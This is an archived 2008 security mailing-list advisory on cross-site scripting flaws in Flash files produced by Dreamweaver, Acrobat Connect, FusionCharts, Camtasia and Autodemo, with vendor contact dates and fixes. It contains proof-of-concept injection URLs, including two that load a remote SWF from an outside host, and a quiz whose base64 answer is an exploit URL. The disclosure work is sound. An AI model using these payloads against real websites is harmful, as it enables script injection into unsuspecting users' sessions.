lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <884d17920801021054k3b2a8b9t1a4cbe64f0bac800@mail.gmail.com>
Date: Wed, 2 Jan 2008 10:54:18 -0800
From: "rich cannings" <rcannings@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, 
	websecurity@...appsec.org
Subject: XSS Vulnerabilities in Common Shockwave Flash
	Files

Hi.

Recently, there has been news regarding Flash authoring tools and XSS,
but the articles contained little technical information. So, I created
a detailed report at:

http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw

An abbreviated version intended for full-disclosure, bugtraq, and
websecurity lists is below.


SUMMARY

Critical vulnerabilities exist in a large number of widely used web
authoring tools that automatically generate Shockwave Flash (SWF)
files, such as Adobe (r) Dreamweaver (r), Adobe Acrobat (r) Connect
(tm) (formerly Macromedia Breeze), InfoSoft FusionCharts, and
Techsmith Camtasia. The flaws render websites that host these
generated SWF files vulnerable to Cross-Site Scripting (XSS).

This problem is not limited to authoring tools. Autodemo, a popular
service provider, used a vulnerable controller SWF in many of their
projects.

Simple Google hacking queries reveal that hundreds of thousands of
SWFs are vulnerable on the Internet, and a considerable percentage of
major Internet sites are affected. We are only reporting XSS
vulnerabilities that have been fixed by the vendors.


THE PROBLEM

Many web authoring tools that automatically generate SWFs insert
identical and vulnerable ActionScript into all saved SWFs or necessary
controller SWFs (think of tools that "save as SWF", "export to SWF",
etc.). The vulnerable ActionScript can used by attackers to execute
arbitrary JavaScript in the security domain of the website hosting the
SWF.

We were unable to perform an exhaustive review of all authoring tools
that generate SWFs. More XSS issues may exist in the products listed
below and certainly exist in other applications that save to SWF.

We are only reporting XSS vulnerabilities that have been fixed by the
vendors. There are more products vulnerable. We will publish more
information when the vendor releases fixes.

Adobe Dreamweaver

The "skinName" parameter is accepted by all Flash files produced by
the "Insert Flash Video" feature. "skinName" can be used to force
victims to load of arbitrary URLs including the "asfunction" protocol
handler:

http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on August 8, 2007. This issue was fixed in the
December Flash player release.

Adobe Acrobat Connect/Macromedia Dreamweaver

"main.swf" is the controller file in all Connect/Breeze online
presentations. This SWF does not properly validate the "baseurl"
parameter; thus causing script injection:

http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on July 31, 2007. This issue was fixed in the
December Flash player release.

InfoSoft FusionCharts

One of the issues found in FusionCharts was that the "dataURL"
parameter allows insertion of arbitrary HTML into a "TextArea"
instance. This allows attackers to load SWFs from other domains:

http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//cannings.org/DoKnowEvil.swf%3F.jpg%22%3E

InfoSoft was contacted on September 2, 2007. Fixes for all issues we
found were released in late September. Webmasters should consult
InfoSoft to properly upgrade their SWFs. See "The Fix" for details.

Techsmith Camtasia

One of the issues found in Camtasia was that the "csPreloader"
parameter loads an arbitrary flash file:

http://www.example.com/Example_controller.swf?csPreloader=http://cannings.org/DoKnowEvil.swf%3f

Techsmith was contacted on August 12, 2007. Fixes for all issues was
released late September. Webmasters should contact Techsmith to
properly upgrade their SWFs. See "The Fix" for details.

Autodemo

Autodemo is a service provider, not an authoring tool. However, like
authoring tools they use a common control file in many demos. The
"onend" parameter in "control.swf" loads arbitrary URLs including the
JavaScript protocol handler:

http://www.example.com/control.swf?onend=javascript:alert(1)//

Autodemo was contacted on August 17, 2007. Autodemo was extremely
responsive to our report and quickly fixed the issue in early
September. Webmasters must update to the latest "control.swf". See
"The Fix" for details.

Autodemo is not the only service provider to have XSS in their
products. They are just the only service provider we looked at.
Readers should be  concerned about other service providers who don't
even know their SWFs are vulnerable.


THE FIX

See http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw.


CREDITS

First and foremost, we thank Stafano Di Paola of Minded Security and
Obscure of EyeonSecurity who thoroughly researched and pioneered every
attack we used.

Thanks to Autodemo, Infosoft, and Techsmith for quickly fixing this
issue. We also thank the Computer Emergency Response Team for
coordinating with the vendors to fix this issue, the Adobe Flash
player development teams for including some fixes in the player (we
hope to see more in the future), the Adobe Software Security
Engineering Team, and the Google Security Team for giving me time to
pursue this research and coauthor a book.


QUIZ

Given the ActionScript:

/*
 * Quiz app
 *
 * To compile:
 *   mtasc -swf Quiz.swf -main -header 10:10:10 Quiz.as
 */

class Quiz {
  static function main(mc) {
    getURL("javascript:someFunction('" + escape(_root.userDefined) + "')");
  }
}

Question

Create an URL for Firefox, Internet Explorer, and Safari that will
execute JavaScript in the domain hosting Quiz.swf.

Answer (in base64)

aHR0cDovL2V4YW1wbGUuY29tL1F1aXouc3dmP3VzZXJEZWZpbmVkPS
cpO2Z1bmN0aW9uJTIwc29tZUZ1bmN0aW9uKGEpe31hbGVydCgxKS8v

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ